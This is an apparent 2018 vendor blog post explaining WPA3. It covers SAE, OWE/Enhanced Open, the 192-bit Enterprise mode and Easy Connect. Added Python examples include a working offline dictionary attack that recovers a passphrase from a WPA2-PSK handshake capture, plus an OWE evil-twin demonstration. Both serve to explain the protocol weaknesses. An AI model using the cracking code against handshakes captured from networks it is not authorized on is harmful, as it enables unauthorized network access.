Posted by Andrew Ross, September 13, 2018
What is the Fuss about WPA3?
After more than a decade, the Wi-Fi Alliance has announced WPA3, the next iteration of its Wi-Fi Protected Access (WPA) security requirements for certified devices. WPA3 has been engineered to address most of the cybersecurity concerns the market has had with WPA2, and alongside it come two new features aimed at the growing number of Wi-Fi IoT devices.
WPA3 and its companion programs include the following updates:
- A new authentication/association protocol for personal networks, Simultaneous Authentication of Equals (SAE), replacing the WPA2-PSK handshake
- A 192-bit security mode for Enterprise (EAP) networks, using a CNSA-aligned suite (AES-256-GCM encryption, SHA-384 for key derivation, and 384-bit elliptic-curve or 3072-bit RSA/DH key exchange). Note that "192-bit" is the security strength, not the key size; the AES key itself is 256 bits
- Opportunistic Wireless Encryption (OWE), certified as Wi-Fi CERTIFIED Enhanced Open™
- Simplified onboarding of headless devices using the Device Provisioning Protocol (DPP), certified as Wi-Fi CERTIFIED Easy Connect™
SAE is mandatory for any WPA3 (Personal) certification. The 192-bit mode is an optional mode of WPA3-Enterprise, and Enhanced Open and Easy Connect are separate certification programs whose adoption will be driven by the needs of the application. It should also be noted that WPA3 networks mandate protected management frames (PMF, 802.11w), so an unauthenticated attacker can no longer forge deauthentication and disassociation frames to knock clients off the network or to force a fresh handshake for capture.
Simultaneous Authentication of Equals (SAE) addresses the best-known weakness of the WPA2-PSK design: the 4-way handshake derives every key from a master key that is itself a fixed function of the passphrase and SSID, so a single captured handshake is enough to test passphrase guesses offline at high speed. The KRACK key-reinstallation attack published by Vanhoef in 2017 hit the same handshake from a different direction; patches for KRACK are available, and WPA3 still runs the 4-way handshake after SAE, so SAE is not a fix for KRACK as such. What SAE changes is where the master key comes from. The passphrase is used in a password-authenticated key exchange (the "Dragonfly" exchange) in which each side contributes fresh random values, so the resulting pairwise master key is session based rather than a static value derived from the PSK. A passive attacker who captures the exchange learns nothing that lets them check a guess offline; each guess costs a live exchange with the AP, which can be rate limited, so brute force becomes an online attack limited to one guess per session. The exchange also gives forward secrecy: learning the passphrase later does not reveal the keys of sessions that were already captured.
SAE is a well understood construction; it has been part of the 802.11s mesh standard since 2011. This provides comfort that we are not venturing out into the great wild west of the technology unknown.
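To make the difference concrete, here is an added example (not from the original post and not Silex code) of exactly why a captured WPA2-PSK handshake is an offline oracle. It reproduces the real WPA2 derivation chain (PBKDF2 passphrase-to-PMK, the 802.11 PRF-512 for the PTK, and the HMAC-SHA1-128 key MIC used with AES-CCMP) over a constructed handshake capture; the SSID, passphrase, MAC addresses, nonces and wordlist are made up, and the EAPOL-Key frame header is filler in which only the field layout is kept accurate:

```python
import hashlib
import hmac
from typing import Optional, Sequence

# Offset of the 16-byte Key MIC inside an EAPOL-Key frame: EAPOL header 4 + descriptor type 1
# + key info 2 + key length 2 + replay counter 8 + nonce 32 + IV 16 + RSC 8 + ID 8 = 81 bytes.
MIC_OFFSET = 81


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK master key: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations) -> 32 bytes.
    It depends only on the passphrase and SSID, so anyone can recompute it from a guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def wpa2_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise transient key of the 4-way handshake. Every input except the PMK travels in
    the clear: both MAC addresses and both nonces are in the captured frames."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key MIC for key descriptor version 2 (AES-CCMP): HMAC-SHA1-128 over the frame, MIC field zeroed."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_capture(passphrase: str, ssid: str, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> dict:
    """Constructed stand-in for a sniffed handshake: message 2 (station -> AP) carries SNonce and a
    MIC under the KCK. Header values before the MIC are filler; only the layout matters here."""
    header = (b"\x01\x03\x00\x5f"                 # EAPOL version 1, type Key, body length 95
              + b"\x02"                            # descriptor type: RSN
              + b"\x01\x0a" + b"\x00\x10"          # key info (pairwise, MIC, version 2), key length
              + (1).to_bytes(8, "big")             # replay counter
              + snonce + bytes(16) + bytes(8) + bytes(8))  # nonce, IV, RSC, ID
    assert len(header) == MIC_OFFSET
    frame = header + bytes(16) + b"\x00\x00"       # zeroed MIC, empty key data
    ptk = wpa2_ptk(wpa2_pmk(passphrase, ssid), aa, spa, anonce, snonce)
    mic = eapol_mic(ptk[:16], frame)               # KCK is the first 128 bits of the PTK
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "eapol": frame}


def offline_dictionary_attack(capture: dict, wordlist: Sequence[str]) -> Optional[str]:
    """Test guesses against the captured MIC. Nothing here talks to the AP: the capture alone
    is a verification oracle, which is the WPA2-PSK property that SAE removes."""
    captured_mic = capture["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for guess in wordlist:
        ptk = wpa2_ptk(wpa2_pmk(guess, capture["ssid"]), capture["aa"], capture["spa"],
                       capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol"]), captured_mic):
            return guess
    return None


def demo() -> Optional[str]:
    # Constructed sample: MACs and nonces are arbitrary; the passphrase sits in a short wordlist.
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    capture = build_capture("correct horse", "CoffeeShopWiFi", aa, spa, anonce, snonce)
    return offline_dictionary_attack(capture, ["password", "letmein", "correct horse", "hunter2"])


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Every value the attacker needs is in the capture, and PBKDF2 at 4096 iterations is the only cost per guess, which is why GPU crackers reach millions of WPA2 guesses per second. Under SAE the PMK fed into wpa2_ptk is the output of the Dragonfly exchange, which depends on both sides' fresh random scalars, so the captured MIC is no longer a function of the passphrase plus public values and the loop above has nothing to check against; the only way to test a guess is to run a new exchange against the live AP.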
The Wi-Fi CERTIFIED Enhanced Open™ feature, based on Opportunistic Wireless Encryption (OWE, RFC 8110), is born from the increasing use of public Wi-Fi networks and the awareness that a great deal of them run with no security at all, leaving every client's traffic readable by anyone within radio range. Some providers have started to print a WPA2 passphrase on the menu or receipt. Since the passphrase is static and, in most cases, easily obtained, this provides little protection: anyone who knows it and captures a client's 4-way handshake can derive that client's keys and decrypt its traffic. OWE instead adds an unauthenticated Diffie-Hellman exchange (P-256 by default) to the association request and response. The shared secret becomes a pairwise master key that is unique to each client, and the normal 4-way handshake then derives per-session encryption keys from it, so data frames are encrypted without the user doing anything. The caveat is in the name: OWE is opportunistic. It defeats passive eavesdropping, but it does not authenticate the access point, so an attacker who sets up a look-alike network will still complete the exchange and see the traffic of clients that join it. Even so, it is an easy fix for a widespread problem and is something that should have been addressed in earlier updates.
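To show both the protection and the caveat, here is an added example (not from the original post, not Silex code, and not a certified implementation) that walks through an OWE key agreement end to end: P-256 point arithmetic written out, the x-only public keys (RFC 6090 compact representation) that OWE carries in the association frames, and the HKDF derivation of the PMK from RFC 8110 section 4.4. Element framing is omitted, the 2-byte little-endian encoding of the group number in the HKDF salt is my reading of the RFC, and the curve arithmetic is not constant time, so treat it as an illustration rather than code to ship:

```python
import hashlib
import hmac
import os

# NIST P-256 (IANA Diffie-Hellman group 19), the default OWE group in RFC 8110.
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
GROUP = 19


def ec_add(p1, p2):
    """Affine point addition on P-256; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None
        lam = (3 * x1 * x1 + A) * pow(2 * y1, P - 2, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, P - 2, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, pt):
    """Double-and-add scalar multiplication (not constant time; illustration only)."""
    acc = None
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc


def point_from_x(x):
    """OWE sends only the x coordinate. Either square root works as y: scalar multiplication of
    (x, y) and (x, -y) gives points with the same x coordinate, which is all DH uses."""
    rhs = (pow(x, 3, P) + A * x + B) % P
    y = pow(rhs, (P + 1) // 4, P)          # valid square root because P % 4 == 3
    if y * y % P != rhs:
        raise ValueError("x is not on the curve")
    return (x, y)


def hkdf(salt, ikm, info, length):
    """HKDF-SHA256 extract-then-expand (RFC 5869)."""
    prk = hmac.new(salt, ikm, hashlib.sha256).digest()
    out, t, i = b"", b"", 1
    while len(out) < length:
        t = hmac.new(prk, t + info + bytes([i]), hashlib.sha256).digest()
        out, i = out + t, i + 1
    return out[:length]


def owe_keypair():
    """Fresh ephemeral key: private scalar and the public x coordinate that goes on the air."""
    priv = int.from_bytes(os.urandom(32), "big") % (N - 1) + 1
    return priv, ec_mul(priv, G)[0]


def owe_pmk(own_priv, peer_x, client_x, ap_x):
    """RFC 8110 section 4.4: z is the shared x coordinate; the HKDF salt is client key || AP key
    || group number (group encoded here as 2-byte little-endian, an assumption of this example)."""
    z = ec_mul(own_priv, point_from_x(peer_x))[0].to_bytes(32, "big")
    salt = client_x.to_bytes(32, "big") + ap_x.to_bytes(32, "big") + GROUP.to_bytes(2, "little")
    return hkdf(salt, z, b"OWE Key Generation", 32)


def owe_association():
    """Honest client and AP. A sniffer sees client_x and ap_x in the open association frames but
    neither private scalar, so it cannot compute z. Returns (client PMK, AP PMK, what was sniffed)."""
    c_priv, c_x = owe_keypair()            # Diffie-Hellman Parameter element, Association Request
    a_priv, a_x = owe_keypair()            # Diffie-Hellman Parameter element, Association Response
    return owe_pmk(c_priv, a_x, c_x, a_x), owe_pmk(a_priv, c_x, c_x, a_x), (c_x, a_x)


def evil_twin():
    """The caveat: nothing authenticates the AP. A rogue AP that answers the client's request
    completes its own exchange and ends up holding the client's session key."""
    c_priv, c_x = owe_keypair()
    r_priv, r_x = owe_keypair()            # rogue AP's keypair
    return owe_pmk(c_priv, r_x, c_x, r_x) == owe_pmk(r_priv, c_x, c_x, r_x)


if __name__ == "__main__":
    client_pmk, ap_pmk, seen = owe_association()
    print("honest PMKs match:", client_pmk == ap_pmk, "| rogue AP gets the key:", evil_twin())
```

The PMK produced by owe_association then feeds the ordinary 4-way handshake, exactly as a WPA2 PMK would, which is why OWE needs no new ciphers or frame formats beyond the one extra element in each association frame. evil_twin is the part to remember when deploying Enhanced Open: the client gets a private channel, but to whoever answered first.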
Raising the security strength for Enterprise-class Wi-Fi users and networks is something being pushed by the US Government. The 192-bit mode aligns with the Commercial National Security Algorithm (CNSA) Suite that the NSA published in 2015 and that the Committee on National Security Systems (CNSS) mandates for National Security Systems through CNSS Policy 15. The CNSS is an interagency body whose secretariat sits within the NSA, and it has been asking for this increased protection for critical networks for several years.
The addition of a simplified onboarding process called Wi-Fi CERTIFIED Easy Connect™ is again something that has been needed for a long time. The updated onboarding process, based on the Device Provisioning Protocol (DPP) and designed to replace WPS (Wi-Fi Protected Setup, whose PIN method can be brute forced in a matter of hours), is a direct response to the increasing number of headless Wi-Fi products (devices without screens) being introduced into the connected home market, such as Alexa, Google Home and connected light bulbs. Although still in development, Easy Connect promises a simple and standardized provisioning protocol: a phone or tablet reads the device's public bootstrapping key from a QR code or a similar out-of-band method, authenticates the device with it, and then pushes the network credentials over an encrypted channel, so the headless device can be securely configured without a passphrase ever being typed into it.
The good news is that everyone is on board with WPA3, and all major Wi-Fi device manufacturers and equipment suppliers have already announced support for the standard, with some introducing products as early as 2018. The Wi-Fi community has taken its time getting this important update to market. The questions are when it will be available and when it will become a must-have.
“…when will WPA3 be a must have technology?”
Although not technically dependent upon each other, many are linking the introduction of the new 802.11ax standard with the broad adoption of WPA3. This makes sense, since both hardware and software work is required to make a device fully certifiable to the new standard. Support for the 192-bit Enterprise mode, in particular, requires GCMP-256, which may need an upgrade to hardware encryption engines that only implement AES-128-CCMP. Most suppliers and manufacturers are expecting broad introduction of 802.11ax devices in 2019, which suggests adoption of both 11ax and WPA3 will start to ramp by 2020.
However, WPA3 certification will not be limited to new 802.11ax devices. Support for WPA3 functionality, specifically the mandatory portions, can be delivered to currently available 802.11ac products as a software update, since SAE is handled in the supplicant or AP software rather than in the cipher hardware. Availability of these updates will depend on market demand and will undoubtedly vary between suppliers. Silex is already working closely with Qualcomm to enable WPA3 in our existing products and hopes to have a full roadmap in early 2019.
Another announcement which is important to the schedule is that a transition mode has already been defined: an AP can advertise both WPA2-PSK and WPA3 SAE on the same SSID, so WPA2 and WPA3 devices can coexist on the same network. It shouldn't be a surprise, as a similar capability existed during the transition from WPA to WPA2. The implication is that existing and future shipping devices without WPA3 capability are, and will continue to be, important to users and their networks. One thing to keep in mind is that a mixed-mode network gives WPA2 clients only WPA2 protection, including the offline-guessable handshake, so the passphrase still needs to be strong until the last WPA2 client is gone. This pushes the must-have timeline out by some distance, provided no further security issues are discovered within WPA2.
“…. don’t panic!”
If you are a supplier of Wi-Fi equipment, it is not the time to panic. Nor should infrastructure owners be looking to replace their 11ac networks anytime soon. Remember that WPA2 has been an incredibly durable protocol: its underlying AES-CCMP encryption has yet to be broken, and its practical weaknesses have been in key management (offline guessing of weak passphrases, KRACK) rather than in the cipher. The industry has a vested interest in keeping it secure and will continue to support it even though WPA3 has been announced.
The Wi-Fi Alliance will not start testing until later this year and is not expected to make WPA3 mandatory for Wi-Fi certification until late 2019 or early 2020. This does not mean all your existing Wi-Fi devices are obsolete; it merely means that when looking at your next generation product, or considering upgrading your WLAN, you have a future option to consider.
Let’s hope it isn’t another ten years before we see the next security update to Wi-Fi.